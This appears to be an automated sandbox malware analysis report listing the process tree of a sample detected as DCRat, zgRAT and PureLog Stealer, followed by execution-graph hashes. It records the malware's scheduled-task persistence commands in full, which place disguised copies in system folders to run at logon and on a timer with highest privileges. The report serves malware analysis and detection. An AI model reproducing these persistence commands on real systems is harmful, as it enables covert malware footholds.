                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff620390000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP"
                                                    Imagebase:0x7ff761ba0000
                                                    File size:52'744 bytes
                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:10:42:00
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                                    Imagebase:0xa80000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 73%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:18
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\java\jre-1.8\upfc.exe"
                                                    Imagebase:0xef0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 14 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /f
                                                    Imagebase:0x7ff7df220000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 6 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:10:42:01
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab" /sc ONLOGON /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff63e920000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat"
                                                    Imagebase:0x7ff67cd10000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff620390000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff7c2980000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:10:42:02
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff7861c0000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Imagebase:0xdb0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
                                                    Imagebase:0x4c0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:40
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Imagebase:0xfd0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 73%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:41
                                                    Start time:10:42:03
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe
                                                    Imagebase:0x4f0000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:42
                                                    Start time:10:42:04
                                                    Start date:03/07/2024
                                                    Path:C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                                    Imagebase:0xf40000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 73%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:43
                                                    Start time:10:42:04
                                                    Start date:03/07/2024
                                                    Path:C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe"
                                                    Imagebase:0x200000
                                                    File size:1'912'832 bytes
                                                    MD5 hash:6667F954763EEACF7EFFCF5A5C25E695
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:9.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      execution_graph 7186 7ff7c1b8c271 7188 7ff7c1b8c2e6 QueryFullProcessImageNameA 7186->7188 7189 7ff7c1b8c434 7188->7189

                                                      Control-flow Graph

                                                      control_flow_graph 739 7ff7c1790d78-7ff7c1790dcb call 7ff7c17907d0 742 7ff7c1790dd0-7ff7c1791080 739->742

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317947383.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1b80000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID:
                                                      • API String ID: 3578328331-0
                                                      • Opcode ID: e0e2ef3b258d237c38e1b63259a31dd01ba6855bf9fbec290f69079e1cf87abf
                                                      • Instruction ID: 610403cacd6693bee26c960f584c0b1c334e72ea9859dad7aa4944f379f8671c
                                                      • Opcode Fuzzy Hash: e0e2ef3b258d237c38e1b63259a31dd01ba6855bf9fbec290f69079e1cf87abf
                                                      • Instruction Fuzzy Hash: 3071B370508A8C8FEB68DF28C8457F977E1FB59311F10427EE84EC7292CB74A9468B91
                                                      • Instruction Fuzzy Hash: F0018C3690C7898FE702EB78C848299BFB0AF06320F1542EAD051DB293E6785A48C790
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd8d964ffb98e61e25fdfb1ea303d384be02734b963183183a2eaac5a4e363e8
                                                      • Instruction ID: 75007f29b25650f75f5d89928687d307915ed90dfd9b5623c51c7618dcdfe358
                                                      • Opcode Fuzzy Hash: cd8d964ffb98e61e25fdfb1ea303d384be02734b963183183a2eaac5a4e363e8
                                                      • Instruction Fuzzy Hash: B1017C3580C7C98FE702EB78884829DBFB0AF06324F1442E6D451DB293EA785A48C751
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction ID: ff3f6a01ba89ec7791faf59098130f0f955a6273bef64bef5e651cafb25ca273
                                                      • Opcode Fuzzy Hash: c0b67d8018478311337d0be313e8e759ba3daf077f094f559c4b14e2bffb0724
                                                      • Instruction Fuzzy Hash: D2F0E131D5840E8BEB64FE29C855BF8B366EB58331F9401BAC40DD3193DEBDA9858B50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction ID: bc585f53cb95a19b4205754609885cded2c5bd28568238c9dcb5f1eb39e2eeb7
                                                      • Opcode Fuzzy Hash: f1d35f1724f1adc6db49046a45d6106ecbbea99bb5a5f4fe40b332a5eb99e0b2
                                                      • Instruction Fuzzy Hash: 36F03031E184098BEB10FE29C849AB8A357AF59370F9041B5C40DD32D7EDADA9498660
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction ID: 278edd2aa508107ed6df67ac48e2af0dcdde818e0e4f5d921451e21bda3221cd
                                                      • Opcode Fuzzy Hash: 8f7ab15e07f9f44bd1b39b12e138568b7c5039ab6e02509fa8ce3889be5409fc
                                                      • Instruction Fuzzy Hash: 20F0A030E0910A4FF744BA35C4143BAA3A09F89330F9400B4C90DD32D3DE28AD458750
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction ID: b37e2e44050ad3ba8960450219b852bdc4dec10a2534946db370d0d3e8fa6bfd
                                                      • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                      • Instruction Fuzzy Hash: 78D0A73012954E8FDA00B73CC8498587BA0EB0F224FE510F1D009C7962C50948658700
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91bc0a54b5817c7a88aa073bed705f364e1aa4ab80e61e6930a14860e0e2bf16
                                                      • Instruction ID: e3360812ad67157e49a2fe52544bf8d073bf6ab0884494f9f5343ab31dc14ab2
                                                      • Opcode Fuzzy Hash: 91bc0a54b5817c7a88aa073bed705f364e1aa4ab80e61e6930a14860e0e2bf16
                                                      • Instruction Fuzzy Hash: 19C04C06D7B55B01A6553A7F644A0ADE1545BCC734FF51572D50C50093ADCF60DD01B6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction ID: a2c726bdd079fd25279bf8f12db869c6b7d685c9014c091ce17eb88c97277c94
                                                      • Opcode Fuzzy Hash: 2b46257708f436c5923578b8ae170b8e8b194bd4aeb4b50011f654afdbe41f5c
                                                      • Instruction Fuzzy Hash: 2AC04C345518098FCA48FB3DC88591877A0FB1D215BD500A0E409C7271D659DCD5CB41
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction ID: 7283d6c6dc003c9f23fb9fa5fd195916ba60a31d533111801245156e430fd33b
                                                      • Opcode Fuzzy Hash: 1c7a7ad0f78c49ac88e4e27d5cff6dad67509f45549e82e338b8b02ad93a7c8e
                                                      • Instruction Fuzzy Hash: 1AC04C305118198FCA44FB7DCA8595476A0FB0D225BD501E0E40DC7175E65A9C95C741
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bb98649dab66eef031d7d131945346077dd7cd5da52cf78b562c4d22e66b36b0
                                                      • Instruction ID: 58080ece71701f421c74593685f0811e8936d0fee9c949b7197cb912b1513361
                                                      • Opcode Fuzzy Hash: bb98649dab66eef031d7d131945346077dd7cd5da52cf78b562c4d22e66b36b0
                                                      • Instruction Fuzzy Hash: E2C04C55E1C81646F6597618441227E48525F95764F9401B4E01D873C7CE4D6A0506CB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction ID: 3f6c1ff9e85a8ada2744b1878be98a4358d47d032d6d5e0a17c7591d60fa8ed7
                                                      • Opcode Fuzzy Hash: 473bf2f2d6d738438761132f2a40cd3d6c140b2d05cc50790289fbb38b3576c1
                                                      • Instruction Fuzzy Hash: 64B01230CB760B81DB28FB730842068F160AF0E239FD006B4D40C41293D8EF50ED4652
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
